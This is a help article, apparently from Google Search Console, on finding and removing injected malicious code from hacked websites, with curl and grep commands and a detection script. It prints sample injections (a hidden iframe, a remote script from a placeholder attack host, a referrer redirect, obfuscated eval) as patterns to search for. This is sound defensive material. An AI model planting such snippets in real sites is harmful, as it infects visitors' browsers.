
Malware infection type: Code injection

What does it mean to have pages marked with malware infection type "Code injection" in Google Search Console?

This means that pages on your site were modified to include malicious code, such as an iframe to a malware attack site.

For more general information on malware, see Assess the damage (hacked with malware).

How do I investigate the "code injection" malware type?

First, avoid using a browser to view infected pages on your site. Because malware often spreads by exploiting browser vulnerabilities, opening an infected page in a browser may damage your computer.

Consider confirming the behavior by using cURL or Wget to perform HTTP requests (for example, to fetch a page). These freely available tools are helpful in diagnosing redirects, and have the flexibility to include referrer or user-agent information. By serving malicious content only to users with specific user-agents or referrers, the hacker can target more "real people" and can better avoid detection from site owners and malware scanners. (Your site will need to be online to use these tools.)

For example:

$ curl -v --referer <referer-field> \
    --user-agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" \
    <your-url>

such as

$ curl -v --referer "http://www.google.com" \
    --user-agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" \
    http://www.example.com/page.html

Next, log in to your filesystem. Investigate all resources that write to the URLs flagged as "code injection". Some examples of malicious code injections are the following:

  • iframe to an attack site

      <iframe frameborder="0" height="0" src="http://<attack-site>/path/file"
        style="display:none" width="0"></iframe>

  • JavaScript or another scripting language that calls and runs scripts from an attack site

      <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>

  • Scripting that redirects the browser to an attack site

      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://malware-attack-site/");
        }
      </script>

  • Malicious code that’s obfuscated to avoid detection

      eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));

  • Shared object files designed to randomly write harmful code to otherwise benign scripts

      #httpd.conf modified by the hacker
      LoadModule harmful_module modules/mod_harmful.so
      AddModule mod_harmful.c

Investigate all possible harmful code present on the site. It may be helpful to search for words like "iframe" to find iframe code. Other helpful keywords are "script", "eval", and "unescape". For example, on Unix-based systems:

$ grep -irn "iframe" ./ | less
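
The keyword search above, extended to the other injection patterns this article lists, as an added example that is not part of the original article. The rule labels and the function name are assumptions, and every hit is a lead to compare against a known-good backup rather than a verdict.

```shell
#!/bin/sh
# Added example, not part of the original article. Rule labels are
# assumptions; the patterns mirror the injection examples listed above.

# scan_injections DIR: print "file:line:label" for every suspicious line.
# Legitimate LoadModule lines and third-party scripts will match too, so
# review each hit against the last good backup before changing anything.
scan_injections() {
  root="$1"
  # One rule per line: label|extended regex (matched case-insensitively).
  while IFS='|' read -r label regex; do
    # -r recurse, -I skip binary files, -n line numbers, -E extended regex
    grep -rIinE -e "$regex" "$root" 2>/dev/null |
      awk -F: -v label="$label" '{ print $1 ":" $2 ":" label }'
  done <<'RULES'
hidden-iframe|<iframe[^>]*(display:[[:space:]]*none|(height|width)=["']?0)
remote-script|<script[^>]*src=["']?https?://
referrer-check|document\.referrer
obfuscated-eval|eval[[:space:]]*\([[:space:]]*(base64_decode|unescape)
apache-module|^[[:space:]]*(LoadModule|AddModule)[[:space:]]
RULES
}

# Usage: scan_injections /path/to/webroot | sort
```

Run it against a copy of the web root and against the server configuration directory; paths that contain a colon will be split incorrectly in the output.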

How do I clean my site of the "code injection" malware type?

When ready to clean up your site (Step 7 of the Help for Hacked Site recovery process), you can either replace affected files with the last good backup or you can remove the code injection from each page and all related scripting functions or files. If you modified server configuration files, you may need to restart your webserver for the changes to become effective.

Please be aware that removing the malicious code doesn't address the underlying vulnerability that allowed the hacker to initially compromise your site. Without correcting the root cause, your site may be compromised again in the future. For more information on cleaning your entire site, not just this malware type, see Help for Hacked Sites, specifically "Filesystem damage assessment" in Step 5: Assess the damage (hacked with malware).
